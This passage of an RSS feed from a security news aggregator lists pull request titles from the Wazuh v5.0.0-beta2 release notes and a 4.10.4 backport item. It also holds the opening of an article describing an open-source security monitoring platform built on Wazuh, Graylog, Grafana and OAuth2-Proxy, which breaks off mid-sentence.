<li>Add protection for double VDFirst scan by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TomasTurina/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TomasTurina">@TomasTurina</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4409096011" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36004" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36004/hovercard" href="https://github.com/wazuh/wazuh/pull/36004">#36004</a></li>
<li>Update python requirements by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TomasTurina/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TomasTurina">@TomasTurina</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4406686569" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35990" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35990/hovercard" href="https://github.com/wazuh/wazuh/pull/35990">#35990</a></li>
<li>Update cryptography and python multipart by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TomasTurina/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TomasTurina">@TomasTurina</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4402201914" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35982" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35982/hovercard" href="https://github.com/wazuh/wazuh/pull/35982">#35982</a></li>
<li>Fix string handling in version comparison function by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vikman90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vikman90">@vikman90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4436011781" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36059" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36059/hovercard" href="https://github.com/wazuh/wazuh/pull/36059">#36059</a></li>
<li>Dependency Reduction Evidence — Debian/Ubuntu by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Miguevrgo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Miguevrgo">@Miguevrgo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4420691857" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36027" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36027/hovercard" href="https://github.com/wazuh/wazuh/pull/36027">#36027</a></li>
<li>Improve cluster file handling path validation in end_receiving_file by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vikman90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vikman90">@vikman90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4437000265" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36060" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36060/hovercard" href="https://github.com/wazuh/wazuh/pull/36060">#36060</a></li>
<li>Solve agent disconnect on direct 4.13→5.0 custom WPK upgrade by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lchico/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lchico">@lchico</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4432345557" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36052" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36052/hovercard" href="https://github.com/wazuh/wazuh/pull/36052">#36052</a></li>
<li>Prevent Windows agent restart abort when service is already stopping by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cborla/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cborla">@cborla</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4406722126" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35991" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35991/hovercard" href="https://github.com/wazuh/wazuh/pull/35991">#35991</a></li>
<li>Remove /bin and /sbin from monitored directories on usrmerge distros by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Darioortegaleyva/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Darioortegaleyva">@Darioortegaleyva</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4435922312" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36058" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36058/hovercard" href="https://github.com/wazuh/wazuh/pull/36058">#36058</a></li>
<li>Fix Coverity Medium Impact Defects - Release 5.0.0 Beta 1 (Agent) by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nbertoldo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nbertoldo">@nbertoldo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4394546182" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35959" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35959/hovercard" href="https://github.com/wazuh/wazuh/pull/35959">#35959</a></li>
<li>Removal of unused dependencies by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jepalfer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jepalfer">@jepalfer</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4419054371" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36010" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36010/hovercard" href="https://github.com/wazuh/wazuh/pull/36010">#36010</a></li>
<li>Deprecate API IT tier 2 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TomasTurina/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TomasTurina">@TomasTurina</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4440330903" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36074" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36074/hovercard" href="https://github.com/wazuh/wazuh/pull/36074">#36074</a></li>
<li>Expand Windows environment variables in SCA rule inputs by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fcontrerasc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fcontrerasc">@fcontrerasc</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4432584503" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36054" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36054/hovercard" href="https://github.com/wazuh/wazuh/pull/36054">#36054</a></li>
<li>Update wodle command arg construction for Windows paths by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/anromerom/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/anromerom">@anromerom</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4400708349" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35973" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35973/hovercard" href="https://github.com/wazuh/wazuh/pull/35973">#35973</a></li>
<li>fix: Coverity Low Impact Defects by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rovogel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rovogel">@rovogel</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4423170822" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36032" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36032/hovercard" href="https://github.com/wazuh/wazuh/pull/36032">#36032</a></li>
<li>Include os_type in agent keepalive cluster sync by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4440766928" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36075" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36075/hovercard" href="https://github.com/wazuh/wazuh/pull/36075">#36075</a></li>
<li>Resolve relative indexer certificate paths by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4447096943" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36090" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36090/hovercard" href="https://github.com/wazuh/wazuh/pull/36090">#36090</a></li>
<li>wazuh-engine: Improve wic index deteccion by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/juliancnn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/juliancnn">@juliancnn</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4446778206" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36087" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36087/hovercard" href="https://github.com/wazuh/wazuh/pull/36087">#36087</a></li>
<li>Adapted curl call for old system on wazuh-control by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/juliancnn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/juliancnn">@juliancnn</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4448366384" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36094" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36094/hovercard" href="https://github.com/wazuh/wazuh/pull/36094">#36094</a></li>
<li>Remove 4_X workflows code from main by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Miguevrgo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Miguevrgo">@Miguevrgo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4428189160" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36044" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36044/hovercard" href="https://github.com/wazuh/wazuh/pull/36044">#36044</a></li>
<li>Update changelog for 4.14.6 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4453253443" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36110" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36110/hovercard" href="https://github.com/wazuh/wazuh/pull/36110">#36110</a></li>
<li>Merge 4.14.6 into main by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4453057596" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36109" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36109/hovercard" href="https://github.com/wazuh/wazuh/pull/36109">#36109</a></li>
<li>Build binutils 2.41 in the deb-agent amd64 builder image by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jr0me/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jr0me">@jr0me</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4454586135" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36128" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36128/hovercard" href="https://github.com/wazuh/wazuh/pull/36128">#36128</a></li>
<li>Ensure all workflows use specific OS by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TomasTurina/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TomasTurina">@TomasTurina</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4449987713" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36104" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36104/hovercard" href="https://github.com/wazuh/wazuh/pull/36104">#36104</a></li>
<li>Refresh apt index before installing flex/bison for binutils 2.41 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jr0me/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jr0me">@jr0me</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4455092073" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36133" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36133/hovercard" href="https://github.com/wazuh/wazuh/pull/36133">#36133</a></li>
<li>Improve json schema for optional time by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/juliancnn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/juliancnn">@juliancnn</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4455312947" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36136" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36136/hovercard" href="https://github.com/wazuh/wazuh/pull/36136">#36136</a></li>
<li>Improve Unit test's readme by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jpcerrone/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jpcerrone">@jpcerrone</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4432590428" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36055" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36055/hovercard" href="https://github.com/wazuh/wazuh/pull/36055">#36055</a></li>
<li>Refresh deb-agent amd64 checkfiles sizes for ld 2.41 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jr0me/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jr0me">@jr0me</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4456699158" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36144" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36144/hovercard" href="https://github.com/wazuh/wazuh/pull/36144">#36144</a></li>
<li>Local wazuh-manager installation by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MiguelazoDS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MiguelazoDS">@MiguelazoDS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4448824674" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36100" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36100/hovercard" href="https://github.com/wazuh/wazuh/pull/36100">#36100</a></li>
<li>Update support new OSs issue template for devOps team by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Enaraque/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Enaraque">@Enaraque</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4467686112" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36154" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36154/hovercard" href="https://github.com/wazuh/wazuh/pull/36154">#36154</a></li>
<li>Unchecked return value defects reported by coverity by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hernanvalenzuela/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hernanvalenzuela">@hernanvalenzuela</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4432710024" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36056" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36056/hovercard" href="https://github.com/wazuh/wazuh/pull/36056">#36056</a></li>
<li>Add workflow to upgrade external dependencies by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jr0me/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jr0me">@jr0me</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4429898627" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36048" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36048/hovercard" href="https://github.com/wazuh/wazuh/pull/36048">#36048</a></li>
<li>Upgrade external deps: curl, sqlite, xz, libarchive (DEPS_VERSION 99-29734) by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jr0me/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jr0me">@jr0me</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4465183248" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36152" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36152/hovercard" href="https://github.com/wazuh/wazuh/pull/36152">#36152</a></li>
<li>Honor shutdown signal in agent-upgrade StartMQ to avoid timeout by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cborla/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cborla">@cborla</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4456527018" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36141" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36141/hovercard" href="https://github.com/wazuh/wazuh/pull/36141">#36141</a></li>
<li>Add keystore and indexer connector component tests workflows by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MiguelazoDS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MiguelazoDS">@MiguelazoDS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4456550832" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36142" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36142/hovercard" href="https://github.com/wazuh/wazuh/pull/36142">#36142</a></li>
<li>DockerListener messages as log by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rovogel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rovogel">@rovogel</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4470535362" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36179" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36179/hovercard" href="https://github.com/wazuh/wazuh/pull/36179">#36179</a></li>
<li>Drop orphan paths before promoting on agent startup by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jr0me/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jr0me">@jr0me</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4472767040" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36198" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36198/hovercard" href="https://github.com/wazuh/wazuh/pull/36198">#36198</a></li>
<li>Build windows externals inside compile_windows_agent image by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jr0me/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jr0me">@jr0me</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4477160865" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36206" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36206/hovercard" href="https://github.com/wazuh/wazuh/pull/36206">#36206</a></li>
<li>Make sync_end_delay interruptible to remove stale modulesd.pid by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lchico/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lchico">@lchico</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4486709088" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36240" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36240/hovercard" href="https://github.com/wazuh/wazuh/pull/36240">#36240</a></li>
<li>Restore vulnerability scanner database workflow by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4487628400" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36254" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36254/hovercard" href="https://github.com/wazuh/wazuh/pull/36254">#36254</a></li>
<li>Bump main branch by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wazuhci/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wazuhci">@wazuhci</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4493638930" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36294" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36294/hovercard" href="https://github.com/wazuh/wazuh/pull/36294">#36294</a></li>
<li>Update CHANGELOG for v5.0.0 Beta 2 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4493854839" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36295" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36295/hovercard" href="https://github.com/wazuh/wazuh/pull/36295">#36295</a></li>
<li>Complete v5.0.0 Beta 2 stage bump and align spec.yaml blob URLs by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4494139494" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36297" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36297/hovercard" href="https://github.com/wazuh/wazuh/pull/36297">#36297</a></li>
</ul>
<h2>New Contributors</h2>
<ul>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hossam1522/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hossam1522">@hossam1522</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4119628979" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35089" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35089/hovercard" href="https://github.com/wazuh/wazuh/pull/35089">#35089</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/20syldev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/20syldev">@20syldev</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4231792036" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35358" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35358/hovercard" href="https://github.com/wazuh/wazuh/pull/35358">#35358</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Enaraque/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Enaraque">@Enaraque</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4467686112" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36154" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36154/hovercard" href="https://github.com/wazuh/wazuh/pull/36154">#36154</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/wazuh/wazuh/compare/v5.0.0-beta1...v5.0.0-beta2"><tt>v5.0.0-beta1...v5.0.0-beta2</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[v4.10.4: Merge pull request #36211 from wazuh/fix/4.10.4-workflows]]></title>
<description><![CDATA[Backport 4.10.4: Update workflows names]]></description>
<link>https://tsecurity.de/de/3535559/it-security-tools/v4104-merge-pull-request-36211-from-wazuhfix4104-workflows/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3535559/it-security-tools/v4104-merge-pull-request-36211-from-wazuhfix4104-workflows/</guid>
<pubDate>Thu, 21 May 2026 10:18:32 +0200</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Backport 4.10.4: Update workflows names</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Open Source Security IT Platform: Threat Detection, Logging, Alerts, AI and SSO integration.]]></title>
<description><![CDATA[A real-world implementation with Wazuh, Graylog, MongoDB, Grafana, Nginx, OAuth2-Proxy, Redis, AI and SSO — no licenses, no vendor lock-in.Managing IT infrastructure security without commercial tools is entirely possible. This documenting the implementation of a complete open source security plat...]]></description>
<link>https://tsecurity.de/de/3528497/hacking/open-source-security-it-platform-threat-detection-logging-alerts-ai-and-sso-integration/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3528497/hacking/open-source-security-it-platform-threat-detection-logging-alerts-ai-and-sso-integration/</guid>
<pubDate>Tue, 19 May 2026 11:23:42 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><strong>A real-world implementation with Wazuh, Graylog, MongoDB, Grafana, Nginx, OAuth2-Proxy, Redis, AI and SSO — no licenses, no vendor lock-in.</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*UMOUaxSeMAE6VlSdtFrnJg.jpeg"></figure><p>Managing IT infrastructure security without commercial tools is entirely possible. This documenting the implementation of a complete open source security platform, deployed in production.</p><p>This is not a generic tutorial. It’s a guide based on real decisions, and an architecture that runs in production today.</p><h3>What problem does this platform solve?</h3><p>In any organization, visibility into what’s happening on servers tends to be fragmented: logs are scattered across different locations, alerts don’t arrive in real time, and each system has its own credentials. The result is an IT team that reacts instead of anticipating.</p><p>This platform centralizes three critical capabilities:</p><ul><li><strong>Threat detection</strong> — Wazuh monitors security events, file integrity, and system behavior in real time.</li><li><strong>Log management</strong> — Graylog receives, indexes, alerts, and allows querying all infrastructure logs from a single point.</li><li><strong>Operational visualization</strong> — Grafana delivers real-time dashboards.</li></ul><p>All of this is accessible through <strong>a single sign-on</strong> using the corporate account, thanks to OAuth2-Proxy.</p><h3>The architecture in brief</h3><p>The solution is built on five layers:</p><p><strong>Detection layer:</strong> Wazuh acts as the SIEM/XDR engine. It analyzes events, correlates alerts, and generates notifications. These events/alerts are sent to Graylog via Fluent Bit.</p><p><strong>Transport layer:</strong> Fluent Bit reads Wazuh events and forwards them to Graylog over RAW TCP. It’s lightweight, efficient, and highly configurable.</p><p><strong>Log management layer:</strong> Graylog parses the JSON data, indexes all events, enables natural language searches, and exposes an Bridge that we later integrate with Claude via MCP.</p><p><strong>Visualization layer:</strong> Grafana connects to Wazuh as a datasource and presents data in real-time operational dashboards.</p><p><strong>Access layer:</strong> Nginx acts as a reverse proxy with TLS ar HTTP header-based authentication. OAuth2-Proxy validates user identity against OIDC and propagates it to each application. Redis stores the sessions.</p><h3>Technology stack</h3><p>The entire stack is open source and runs on a single Linux server:</p><ul><li>Ubuntu 26.04 LTS</li><li>Wazuh v4.14.5</li><li>Graylog v7.1.0</li><li>MongoDB v7.0</li><li>Grafana v13.0.1</li><li>OAuth2-Proxy v7.15.2</li><li>Fluent Bit v5.0.5</li><li>Nginx v1.28.3</li><li>Redis v8.0.5</li></ul><p><strong>Hardware:</strong> Minimum 8 CPU cores, 16 GB RAM <br><strong>Storage:</strong> Dedicated LVM volumes (OS, data and logs separated)</p><h3>Why this design?</h3><p>Two architectural decisions deserve explanation:</p><p><strong>Separate LVM volumes.</strong> The operating system, application data, and logs live on independent partitions. If logs grow out of control, they don’t affect the OS or application data. Scaling log storage is as simple as expanding the corresponding volume.</p><p><strong>A single authentication 